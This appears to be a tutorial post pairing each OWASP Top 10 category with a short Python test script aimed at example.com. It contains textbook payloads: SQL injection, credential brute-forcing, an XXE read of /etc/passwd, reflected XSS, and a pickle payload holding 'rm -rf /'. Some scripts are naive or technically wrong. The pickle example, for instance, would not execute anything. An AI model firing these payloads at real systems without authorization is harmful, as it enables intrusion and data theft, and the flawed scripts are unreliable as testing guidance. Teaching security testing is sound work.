Top 10 OWASP Vulnerabilities and Python Scripts to Test Them
- Injection: Injection vulnerabilities occur when untrusted data is sent to an interpreter as part of a command or query. To test for injection vulnerabilities using Python, you can use the
requests
library to send payloads and analyze the responses. Here's an example script to test for SQL injection:
import requests
url = "http://example.com/vulnerable_page.php"
payload = "' OR 1=1--"
params = {"id": payload}
response = requests.get(url, params=params)
if "error" in response.text.lower():
print("Potential SQL injection vulnerability detected!")
else:
print("No SQL injection vulnerability found.")
- Broken Authentication: Broken authentication vulnerabilities allow attackers to compromise passwords, keys, or session tokens. To test for broken authentication using Python, you can attempt to bypass login pages or brute-force credentials. Here's an example script to test for weak passwords:
import requests
url = "http://example.com/login.php"
usernames = ["admin", "user", "test"]
passwords = ["password", "123456", "qwerty"]
for username in usernames:
for password in passwords:
data = {"username": username, "password": password}
response = requests.post(url, data=data)
if "welcome" in response.text.lower():
print(f"Weak credentials found: {username}:{password}")
- Sensitive Data Exposure: Sensitive data exposure vulnerabilities occur when sensitive information is not properly protected. To test for sensitive data exposure using Python, you can analyze responses for leakage of sensitive information. Here's an example script to check for credit card numbers in responses:
import requests
import re
url = "http://example.com/user_profile.php"
response = requests.get(url)
pattern = r"\b(?:\d{4}[-\s]?){3}\d{4}\b"
matches = re.findall(pattern, response.text)
if matches:
print("Potential credit card numbers found:")
for match in matches:
print(match)
else:
print("No credit card numbers found.")
- XML External Entities (XXE): XXE vulnerabilities occur when an application parses untrusted XML input without proper validation. To test for XXE using Python, you can send malicious XML payloads and observe the responses. Here's an example script to test for XXE:
import requests
url = "http://example.com/parse_xml.php"
payload = '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><root>&xxe;</root>'
headers = {"Content-Type": "application/xml"}
response = requests.post(url, data=payload, headers=headers)
if "root:x" in response.text:
print("XXE vulnerability detected!")
else:
print("No XXE vulnerability found.")
- Broken Access Control: Broken access control vulnerabilities allow attackers to access unauthorized resources or perform unauthorized actions. To test for broken access control using Python, you can attempt to access restricted pages or modify parameters. Here's an example script to test for insecure direct object references (IDOR):
import requests
url = "http://example.com/user_profile.php"
user_id = "1234"
attacker_id = "5678"
response = requests.get(url + "?id=" + attacker_id)
if "welcome" in response.text.lower():
print("IDOR vulnerability detected!")
else:
print("No IDOR vulnerability found.")
- Security Misconfiguration: Security misconfiguration vulnerabilities occur when security settings are not properly configured. To test for security misconfigurations using Python, you can check for default credentials, exposed debugging information, or misconfigured HTTP headers. Here's an example script to check for exposed debugging information:
import requests
url = "http://example.com/debug.php"
response = requests.get(url)
if "debug" in response.text.lower():
print("Exposed debugging information found!")
else:
print("No exposed debugging information found.")
- Cross-Site Scripting (XSS): XSS vulnerabilities allow attackers to inject malicious scripts into web pages viewed by other users. To test for XSS using Python, you can send payloads and analyze the responses for script execution. Here's an example script to test for reflected XSS:
import requests
url = "http://example.com/search.php"
payload = '<script>alert("XSS")</script>'
params = {"q": payload}
response = requests.get(url, params=params)
if payload in response.text:
print("Reflected XSS vulnerability detected!")
else:
print("No reflected XSS vulnerability found.")
- Insecure Deserialization: Insecure deserialization vulnerabilities occur when untrusted data is deserialized by an application. To test for insecure deserialization using Python, you can send malicious serialized objects and observe the application's behavior. Here's an example script to test for insecure deserialization using the
pickle
module:
import requests
import pickle
url = "http://example.com/deserialize.php"
payload = pickle.dumps({"cmd": "rm -rf /"})
headers = {"Content-Type": "application/x-python-serialize"}
response = requests.post(url, data=payload, headers=headers)
if "success" in response.text.lower():
print("Insecure deserialization vulnerability detected!")
else:
print("No insecure deserialization vulnerability found.")
- Using Components with Known Vulnerabilities: Using components with known vulnerabilities can expose an application to attacks. To test for known vulnerabilities using Python, you can use tools like
safety
to check the dependencies of your project. Here's an example command to check for known vulnerabilities:
safety check -r requirements.txt
- Insufficient Logging & Monitoring: Insufficient logging and monitoring can make it difficult to detect and respond to attacks. To test for insufficient logging and monitoring using Python, you can analyze the application's logs and check for missing or inadequate logging. Here's an example script to check for the presence of log files:
import os
log_directory = "/var/log/myapp"
if os.path.exists(log_directory):
print("Log directory exists.")
log_files = os.listdir(log_directory)
if log_files:
print("Log files found:")
for log_file in log_files:
print(log_file)
else:
print("No log files found.")
else:
print("Log directory does not exist.")
These are just a few examples of how you can use Python to test for the OWASP Top 10 vulnerabilities. Remember to always obtain proper authorization before testing any application and to conduct tests in a responsible and ethical manner.